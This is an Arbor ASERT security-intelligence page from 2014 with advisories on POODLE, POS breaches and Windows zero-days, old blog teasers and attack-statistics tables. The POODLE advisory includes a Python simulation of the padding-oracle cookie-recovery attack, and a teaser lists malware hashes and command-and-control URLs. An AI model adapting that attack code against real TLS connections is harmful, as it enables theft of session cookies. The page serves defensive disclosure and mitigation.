
ASERT Security Intelligence

Summary: Microsoft, Oracle, and Adobe released a large batch of updates for vulnerabilities in multiple products, including Microsoft Internet Explorer, Microsoft Office, Java, and Adobe Flash Player. Users and administrators are encouraged to patch as soon as possible. Three Microsoft zero-day vulnerabilities, patched in this week's update, are reportedly being exploited in the wild in limited, targeted cyber espionage attacks. Given the popularity of these applications and systems, attackers will likely continue to target unpatched machines. Another major vulnerability was reported this week with news of the POODLE attack against SSL version 3. Although SSLv3 has been superseded by TLS, most clients still fall back to it when a TLS handshake fails, and a man-in-the-middle who forces that fallback can exploit SSLv3's padding weakness to extract data such as session cookies from HTTPS connections. Where possible, SSLv3 should be disabled on both servers and client-side browsers. News of POS compromises continues, as Kmart and Dairy Queen have disclosed information on recent payment data breaches. Dairy Queen was targeted with the Backoff POS malware after attackers obtained account credentials from a third-party vendor. Kmart, meanwhile, has not disclosed details about the malware involved except that it went undetected by its antivirus solutions.

Title: SSL 3.0 Vulnerable to “POODLE” Attack
Severity Level: Extreme Severity
Published: Fri, 17 Oct 2014 10:51:10 +0000
A vulnerability in SSL version 3 (CVE-2014-3566) has been disclosed together with the "POODLE" attack (Padding Oracle On Downgraded Legacy Encryption). SSLv3's CBC cipher suites check only the last byte of a record's padding and ignore the rest, so a man-in-the-middle who can also make the victim's browser issue requests (for example from injected JavaScript) can use the server's accept/reject behaviour as a padding oracle and recover secrets such as session cookies from HTTPS connections one byte at a time, at an average cost of 256 requests per byte. This has serious ramifications because most TLS clients still fall back to SSLv3 when a handshake with TLS 1.0 or higher fails, so the same attacker can simply disrupt the TLS handshakes and force an SSLv3 connection in which to capture sensitive data.
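The padding-oracle step described above, as an added simulation that is not ASERT's code and not part of the original advisory. Assumptions: a toy SHA-256 Feistel permutation stands in for AES, a fresh IV per record stands in for the chained CBC state of real SSLv3 records, `SECRET` is a constructed cookie, and the simulated record layer accepts or rejects records the way SSLv3 does (pad-length byte checked, padding contents ignored, MAC checked after the padding is stripped). The `strict` flag switches in the TLS 1.0 check on every padding byte to show that the oracle then disappears.

```python
import hashlib
import hmac
import os

BLOCK = 16     # block size of the toy cipher (same as AES)
MAC_LEN = 20   # SSLv3 record MAC length with SHA-1
ROUNDS = 4

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key: bytes, r: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([r]) + half).digest()[:8]

def toy_encrypt_block(key: bytes, block: bytes) -> bytes:
    # Assumption: a 4-round SHA-256 Feistel permutation stands in for AES.
    left, right = block[:8], block[8:]
    for r in range(ROUNDS):
        left, right = right, xor(left, _f(key, r, right))
    return right + left

def toy_decrypt_block(key: bytes, block: bytes) -> bytes:
    right, left = block[:8], block[8:]
    for r in reversed(range(ROUNDS)):
        left, right = xor(right, _f(key, r, left)), left
    return left + right

def cbc_encrypt(key: bytes, iv: bytes, pt: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = toy_encrypt_block(key, xor(pt[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += xor(toy_decrypt_block(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

class RecordLayer:
    """MAC-then-pad-then-encrypt CBC records shared by the victim's browser (seal) and
    the server (open). strict=False is SSLv3: only the pad-length byte is checked.
    strict=True is the TLS 1.0 check on every padding byte, which closes the oracle."""

    def __init__(self, strict: bool = False):
        self.enc_key, self.mac_key, self.strict = os.urandom(16), os.urandom(16), strict

    def seal(self, data: bytes) -> bytes:
        mac = hmac.new(self.mac_key, data, hashlib.sha1).digest()
        pad_len = BLOCK - 1 - ((len(data) + MAC_LEN) % BLOCK)
        body = data + mac + bytes([pad_len]) * (pad_len + 1)
        iv = os.urandom(BLOCK)   # fresh IV per record stands in for SSLv3's chained CBC state
        return iv + cbc_encrypt(self.enc_key, iv, body)

    def open(self, record: bytes) -> bool:
        body = cbc_decrypt(self.enc_key, record[:BLOCK], record[BLOCK:])
        pad_len = body[-1]
        if pad_len >= BLOCK:
            return False
        if self.strict and body[-(pad_len + 1):] != bytes([pad_len]) * (pad_len + 1):
            return False
        body = body[:-(pad_len + 1)]            # SSLv3 strips the padding without reading it
        data, mac = body[:-MAC_LEN], body[-MAC_LEN:]
        return hmac.compare_digest(mac, hmac.new(self.mac_key, data, hashlib.sha1).digest())

SECRET = b"sid=4a9f0c2e7b31"   # constructed session cookie the attacker wants to read

def victim_request(rl: RecordLayer, prefix_len: int, suffix_len: int) -> bytes:
    # The victim's browser, driven by attacker JavaScript, sends a request whose path and
    # body lengths the attacker chooses; the cookie sits between them.
    return rl.seal(b"A" * prefix_len + SECRET + b"B" * suffix_len)

def poodle_attempt(rl: RecordLayer, target: int):
    """One attempt on SECRET[target]: returns the byte, or None if the server rejected."""
    prefix_len = (BLOCK - 1 - target) % BLOCK                    # target byte ends its block
    suffix_len = -(prefix_len + len(SECRET) + MAC_LEN) % BLOCK   # last block is all padding
    rec = victim_request(rl, prefix_len, suffix_len)
    blocks = [rec[i:i + BLOCK] for i in range(0, len(rec), BLOCK)]   # blocks[0] is the IV
    i = 1 + (prefix_len + target) // BLOCK                       # block holding the target
    n = len(blocks) - 1                                          # the padding block
    blocks[n] = blocks[i]                                        # the POODLE substitution
    if not rl.open(b"".join(blocks)):
        return None
    # Accepted only if D(C_i)[15] ^ C_{n-1}[15] == 15, and P_i[15] = D(C_i)[15] ^ C_{i-1}[15].
    return (BLOCK - 1) ^ blocks[n - 1][-1] ^ blocks[i - 1][-1]

def poodle_recover(rl: RecordLayer, max_attempts: int = 20000):
    """Recover SECRET byte by byte; returns (secret, total requests), about 256 per byte."""
    recovered, attempts = bytearray(), 0
    for target in range(len(SECRET)):
        for _ in range(max_attempts):
            attempts += 1
            value = poodle_attempt(rl, target)
            if value is not None:
                recovered.append(value)
                break
        else:
            raise RuntimeError("no oracle hit: the padding check is not SSLv3-style")
    return bytes(recovered), attempts

if __name__ == "__main__":
    secret, attempts = poodle_recover(RecordLayer(strict=False))
    print(secret, attempts / len(SECRET))
```

Running it recovers `SECRET` in roughly 256 requests per byte, while the same substitution against the strict record layer is always rejected. The practical fix is to stop negotiating SSLv3 at all: remove it from the server's protocol list (for example `SSLProtocol all -SSLv3` in Apache httpd, or `ssl_protocols TLSv1 TLSv1.1 TLSv1.2;` in nginx) and then confirm with `openssl s_client -connect host:443 -ssl3` from an OpenSSL build that still includes SSLv3, which should no longer complete a handshake.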

Title: POS Attacks Continue: Kmart, Dairy Queen Disclose Recent Breaches
Severity Level: Elevated Severity
Published: Fri, 17 Oct 2014 10:51:10 +0000
Dairy Queen has announced that nearly 400 US stores were hit with a malware attack using a variant of the Backoff POS malware. Kmart has also announced this week that its POS registers were compromised with malware: 1,200 stores were reportedly infected over the past month.

Title: Multiple Microsoft Zero-day Vulnerabilities Exploited in Targeted Attacks
Severity Level: Normal Severity
Published: Fri, 17 Oct 2014 10:51:10 +0000
Three zero-day vulnerabilities patched by Microsoft this week have reportedly been exploited in targeted attacks. The first (CVE-2014-4114) is present in every supported version of Windows as well as Windows Server 2008 and 2012; the flaw, in the OLE package manager, could allow remote code execution if the victim opens a specially crafted Microsoft Office document. The vulnerability was exploited, often in conjunction with other vulnerabilities, starting in August in an attack campaign dubbed "Sandworm". Attackers used spear-phishing emails with malicious PowerPoint documents to target NATO, Ukrainian, and Western government organizations as well as energy-sector, telecommunications, and US academic entities. Sandworm is believed to be the work of Russian hackers conducting cyber espionage. The malicious documents delivered the BlackEnergy malware onto targeted systems in order to exfiltrate data, activity that other security researchers profiled earlier this summer. Although BlackEnergy was originally popular among cybercriminals, it and other cybercrime tools such as banking trojans have increasingly been observed in targeted espionage campaigns as well.

Two other Windows kernel zero-days patched by Microsoft this week (CVE-2014-4148 and CVE-2014-4113) were also reportedly used in limited, targeted attacks. Left unpatched, they can be exploited for elevation of privilege in order to execute code in the context of the Windows kernel. One campaign, reportedly linked to threat actors in China, has actively used CVE-2014-4113 since February along with other local privilege escalation vulnerabilities.

Title: Critical Patches Released by Microsoft, Oracle, and Adobe
Severity Level: Extreme Severity
Published: Fri, 17 Oct 2014 10:51:10 +0000
Microsoft, Oracle, and Adobe all released security updates on Tuesday.


IETF Discusses Deprecating IPv6 Fragments

The IETF IPv6 maintenance working group has begun discussions about deprecating IPv6 fragmented packets, spurred by the IETF Internet-Draft "IPv6 Fragment Header Deprecated". As one can guess, this draft has generated a lot of discussion. Although the Internet-Draft formally deprecates only the IPv6 Fragment header, that header is the sole mechanism for fragmentation in IPv6 (routers never fragment; only the source does), so deprecating it would effectively deprecate IPv6 fragmented packets.

As I noted in an earlier posting here, fragments in IPv6 can create havoc in networks from an operational and a security perspective, [...]
Wed, 10 Jul 2013 15:55:39 +0000

DirtJumper’s DDoS Engine Gets a Tune-Up with new “Drive” Variant

Over the last few months ASERT has been tracking what appears to be a new variant in the DirtJumper family (for more information on the history of the DirtJumper family see our previous posts [1] [2] [3]) that we have dubbed "Drive." Drive is written in Delphi and sports a new and much more powerful DDoS engine than its predecessors. It has also changed the format of attack commands [...]
Wed, 19 Jun 2013 15:44:26 +0000

The Revolution Will Be Written in Delphi

Since it has been a little while since we profiled a DDoS botnet family on the blog, let's take a look at Trojan.BlackRev (also known as the "Black Revolution" trojan). It was named for the mutex set in early versions of the malware. This family is interesting from a research perspective because there are at least four revisions in the wild, showing its progression from a basic DDoS bot to a more advanced one.

Rev   MD5                               C&C URL                               C&C IP
1     06d8da1e14cff81ca2fad02d2a878c72  http://userhaos.ru/113/bot/gate.php   91.105.232.105
2     c9c6aeacee9f973ca0ca5da101a12a16  http://ergoholding.ru/rev/gate.php    91.204.122.100
2.5   7141cacc3f4a191015a176947a403b79  http://clfrev.ru/rev/panel/gate.php   93.170.130.112
3     eae553d72142f9dcb06c5c134015fe7a  http://ergoholding.ru/ddd/gate.php    91.204.122.100

The programming language used is [...]
Tue, 21 May 2013 17:57:06 +0000

Syria goes dark, once more

Last week, Syria was taken offline, as our ATLAS data showcased very clearly.

Today, Syria is once again in the dark, as highlighted by the following ATLAS data below.

[ATLAS traffic graph for Syria, 15 May 2013]

We’re keeping an eye on the situation in Syria and will update this post with new information if and when it becomes available.


Wed, 15 May 2013 14:58:50 +0000

Syria taken offline

ATLAS is Arbor Networks' innovative, one-of-a-kind Internet monitoring system. ATLAS is a collaborative effort with 250+ ISPs globally who have agreed to share anonymous traffic data on an hourly basis (leveraging Arbor's technology that sits on ISP networks), together with data from Arbor dark address monitoring probes, as well as third-party and other data feeds. In total, ATLAS is seeing 42 Tbps of peak IPv4 traffic. With this unique vantage point, Arbor is ideally positioned to deliver intelligence about malware, exploits, phishing [...]
Wed, 08 May 2013 11:07:38 +0000


Top Attacks (past 24 hours)

Description                                                            Attacks per subnet   Change from yesterday   CVE             Percentage
Setup.php access                                                       160.87               +23.9 %                                 37.2%
VNC network scanning activity                                          89.54                -38.6 %                                 20.7%
SSH brute-force login attempts                                         13.51                -40.8 %                                 3.1%
MYSQL brute-force login attempts                                       13.28                -34.6 %                                 3.1%

Description                                                            Attacks per subnet   Change from yesterday   CVE             Percentage
SNMP MS Windows getbulk request                                        7.66                 +248.4 %                CVE-2006-5583   1.8%
POLICY Incoming Basic Auth Base64 HTTP Password detected unencrypted   2.00                 +113.1 %                                0.5%
POLICY Outgoing Basic Auth Base64 HTTP Password detected unencrypted   2.00                 +113.1 %                                0.5%

Top Scanned Services (past 24 hours)

Description            Traffic per subnet   Change from yesterday   Latest CVE      Percentage
UDP/0                  159.77 kB            +inf %                  CVE-1999-0675   21.7%
UDP/3395 (dyna-lm)     87.18 kB             -33.7 %                                 11.9%
UDP/5060 (sip)         69.95 kB             -14.1 %                 CVE-2006-0189   9.5%
UDP/4614               46.85 kB             -29.4 %                                 6.4%
UDP/514 (syslog)       34.56 kB             +54.4 %                                 4.7%

Description            Traffic per subnet   Change from yesterday   Latest CVE      Percentage
UDP/0                  159.77 kB            +inf %                  CVE-1999-0675   21.7%
TCP/7212               14.11 kB             +inf %                                  1.9%
TCP/1433 (ms-sql-s)    7.91 kB              +inf %                  CVE-2008-5416   1.1%
UDP/19 (chargen)       6.34 kB              +inf %                                  0.9%
UDP/3146 (bears-02)    5.94 kB              +inf %                                  0.8%

Top Threat Sources (past 24 hours)

Country Rank Attacks per subnet Scans per subnet Botnets Phishing DoS
US (United States) 1 13 33.26 kB 4 13288 2823
ZA (South Africa) 2 91 194.37 kB 0 99 0
FR (France) 3 2 7.92 kB 7 3987 300
DE (Germany) 4 9 36.82 kB 3 1775 648
IR (Iran) 5 0 98.15 kB 0 75 189
GB (Great Britain) 6 0 18.15 kB 2 1055 736
KR (South Korea) 7 1 2.73 kB 3 70 1328
CN (China) 8 18 15.98 kB 4 368 758
NL (Netherlands) 9 11 24.51 kB 4 656 389
TR (Turkey) 10 0 185.95 B 0 1491 222
BR (Brazil) 11 3 2.54 kB 0 891 460
CA (Canada) 12 5 2.28 kB 2 1306 207
RU (Russian Federation) 13 11 27.56 kB 5 427 162
AU (Australia) 14 0 308.60 B 0 882 251
EU (European Union) 15 0 11.92 kB 0 851 18
MY (Malaysia) 16 0 13.72 B 0 218 524
IT (Italy) 17 0 451.57 B 1 931 71
ES (Spain) 18 5 3.40 kB 0 456 274
IN (India) 19 16 17.48 kB 0 276 111
IL (Israel) 20 59 19.09 kB 1 183 109
 
ASN Rank Attacks per subnet Scans per subnet Botnets Phishing DoS
AS16276 (OVH) 1 0 0 B 4 3657 71
AS37053 (RSAWEB-AS,ZA) 2 82 124.27 kB 0 0 0
AS12880 (DCI-AS) 3 0 50.25 kB 0 0 41
AS3741 (IS,ZA) 4 7 41.74 kB 0 0 0
AS4134 (CHINANET-BACKBONE) 5 12 6.79 kB 0 368 258
AS46606 (UNIFIEDLAYER-AS-1) 6 0 0 B 0 934 0
AS26496 (AS-26496-GO-DADDY-COM-LLC) 7 0 0 B 0 895 0
AS24940 (HETZNER-AS) 8 2 3.65 kB 0 529 96
AS11042 (LANDIS-HOLDINGS-INC) 9 0 0 B 0 777 0
AS23352 (SERVERCENTRAL) 10 0 0 B 0 747 0
AS42910 (SADECEHOSTING-COM) 11 0 0 B 0 691 0
AS12586 (ASGHOSTNET) 12 0 0 B 0 689 0
AS46664 (VOLUMEDRIVE) 13 0 19.14 kB 0 99 22
AS29073 (ECATEL-AS) 14 10 18.03 kB 1 0 42
AS16265 (FIBERRING) 15 1 809.18 B 1 292 150
AS4766 (KIXS-AS-KR) 16 0 0 B 2 0 319
AS9116 (GOLDENLINES-ASN) 17 59 18.94 kB 0 0 0
AS32780 (HOSTINGSERVICES-INC) 18 0 0 B 0 574 0
AS36476 (WEB-COM-ASN1) 19 0 0 B 0 570 0
AS13301 (UNITEDCOLO-AS) 20 0 19.03 kB 0 0 0